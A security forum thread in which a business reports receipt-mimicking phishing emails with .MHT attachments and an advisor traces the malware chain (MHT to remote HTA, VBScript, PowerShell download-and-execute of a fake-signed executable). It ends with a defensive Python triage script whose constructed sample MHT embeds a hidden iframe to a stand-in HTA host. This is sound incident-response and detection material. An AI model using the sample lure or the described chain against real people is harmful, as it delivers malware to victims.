
Fake Email to Customers Mimicking Email from our Company


3 replies to this topic

#1 smgrownc

smgrownc

  • Members
  • 2 posts
  • OFFLINE
  • Local time:12:29 AM

Posted 27 December 2017 - 02:49 PM

Within the last 48 hours, 3 customers and 1 employee of our company have received emails that mimic our E-commerce transaction receipt email very closely. The email is off very slightly but there's an attachment - extension ending is .MHT. The only thing these 4 individuals have in common that I know of is our company.

 

Has anyone seen this sort of email behavior recently and any ideas where to dig to root it out? I'm quite sure it's either malware, ransomware, or a phishing attempt.

 

Thanks in advance for any help.





#2 Didier Stevens

Didier Stevens

  • BC Advisor
  • 2,672 posts
  • OFFLINE
  • Gender:Male
  • Local time:06:29 AM

Posted 27 December 2017 - 05:14 PM

Have you submitted the file to VirusTotal? If so, can you share the link here?


Didier Stevens
http://blog.DidierStevens.com
http://DidierStevensLabs.com

SANS ISC Handler
Microsoft MVP 2011-2016 Consumer Security, Windows Insider MVP 2016-2018

 

If you send me messages, per Bleeping Computer's Forum policy, I will not engage in a conversation, but try to answer your question in the relevant forum post. If you don't want this, don't send me messages.

 

Stevens' law: "As an online security discussion grows longer, the probability of a reference to BadUSB approaches 1.0"


#3 smgrownc

smgrownc
  • Topic Starter

  • Members
  • 2 posts
  • OFFLINE
  • Local time:12:29 AM

Posted 28 December 2017 - 08:53 AM

Didier - Here are the VirusTotal links to both the file and the URL/IP/Domain. The URL/IP scan in PayloadSecurity gave a falcon-threatscore of 20/100 - what does that signify to you?

 

https://www.virustotal.com/#/file/2a7a3bbb6fc2556342414a221b4bd46072b5b125866fbc7622d5c4eb8f085df0/detection

 

https://www.virustotal.com/#/search/mailto:email@customerswebmails.com



#4 Didier Stevens

Didier Stevens

  • BC Advisor
  • 2,672 posts
  • OFFLINE
  • Gender:Male
  • Local time:06:29 AM

Posted 28 December 2017 - 05:54 PM

It's malware. The mht file has a URL to a hta file, that contains VBScript that runs a PowerShell command.

That PowerShell command downloads and executes a Windows executable.

 

It was not known by VirusTotal, I submitted it: https://www.virustotal.com/en/file/786e52d7557cde37c5b5e11a32eb4579d9c066cc3113a7048f7933ba30abfd8b/analysis/1514501304/

 

It contains a Microsoft digital signature taken from a genuine Windows executable. Don't know what it does (yet).


Edited by Didier Stevens, 28 December 2017 - 05:58 PM.

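The chain described in the post above starts with a reference the MHT container has to carry in clear MIME: an MHT is a multipart/related message whose parts are usually quoted-printable or base64 encoded, so the URL to the remote .hta is recoverable without opening the file in Internet Explorer. As an added example (not part of the thread and not Didier Stevens' tooling), the following Python script parses an MHT offline, decodes each part, and lists every absolute URL and src/href reference it makes, flagging targets whose extension hands control to a script host (mshta.exe for .hta, wscript.exe for .vbs/.js, powershell.exe for .ps1). The sample MHT embedded at the bottom and the hostname invoice-update.invalid are constructed for this example.

```python
"""Offline triage of an .MHT (MHTML) attachment.

Added example for this thread, not tooling from it. The sample MHT and the
hostname invoice-update.invalid below are constructed for demonstration.
"""
import email
import re
from email import policy
from urllib.parse import urlparse

# Targets a renderer will not display but a Windows script host will execute.
SUSPICIOUS_EXTENSIONS = {
    ".hta", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1", ".exe", ".scr", ".dll",
}

# Absolute URLs anywhere in a decoded part.
ABSOLUTE_URL_RE = re.compile(rb"""(?:https?|ftp|file)://[^\s"'<>)]+""", re.IGNORECASE)
# src= / href= / data= attribute values, quoted or not; also catches relative references.
ATTRIBUTE_REF_RE = re.compile(rb"""\b(?:src|href|data)\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def target_extension(ref: str) -> str:
    """Lower-cased extension of the last path component of a URL or relative reference."""
    name = urlparse(ref).path.rsplit("/", 1)[-1]
    return name[name.rfind("."):].lower() if "." in name else ""


def extract_references(mht_bytes: bytes) -> list[dict]:
    """Return one record per (part, reference) found in the decoded MHT parts."""
    msg = email.message_from_bytes(mht_bytes, policy=policy.default)
    records, seen = [], set()
    for part in msg.walk():
        if part.is_multipart():
            continue
        # decode=True undoes the quoted-printable / base64 transfer encoding
        payload = part.get_payload(decode=True) or b""
        location = part.get("Content-Location", part.get_content_type())
        refs = [m.group(0) for m in ABSOLUTE_URL_RE.finditer(payload)]
        refs += [m.group(1) for m in ATTRIBUTE_REF_RE.finditer(payload)]
        for raw in refs:
            ref = raw.decode("utf-8", "replace")
            if (location, ref) in seen:
                continue
            seen.add((location, ref))
            ext = target_extension(ref)
            records.append({
                "part": str(location),
                "ref": ref,
                "extension": ext,
                "suspicious": ext in SUSPICIOUS_EXTENSIONS,
            })
    return records


def suspicious_references(mht_bytes: bytes) -> list[str]:
    """Only the references worth pivoting on (sandbox submission, proxy block)."""
    return [r["ref"] for r in extract_references(mht_bytes) if r["suspicious"]]


# Constructed sample: a receipt-lookalike MHT with a hidden iframe to a remote HTA.
SAMPLE_MHT = b"""Subject: Your order receipt
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----=_NextPart_000"

------=_NextPart_000
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Location: file:///C:/receipt.htm

<html><body>
<p>Thank you for your order.</p>
<iframe src=3D"http://invoice-update.invalid/view.hta" width=3D0 height=3D0></iframe>
<img src=3D"http://invoice-update.invalid/logo.png">
</body></html>

------=_NextPart_000--
"""

if __name__ == "__main__":
    for rec in extract_references(SAMPLE_MHT):
        flag = "SUSPICIOUS" if rec["suspicious"] else "ok"
        print(f"{flag:10} {rec['part']} -> {rec['ref']}")
```

Run it against the real attachment with `extract_references(open("receipt.mht", "rb").read())`; the flagged URL is what goes to the sandbox and the proxy blocklist. For the executable at the end of the chain, a signature lifted from a genuine Microsoft binary does not validate against the new file: on Windows, `Get-AuthenticodeSignature` reports a Status of HashMismatch rather than Valid, which is the quick check to run before trusting the signer name shown in the file's properties dialog.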




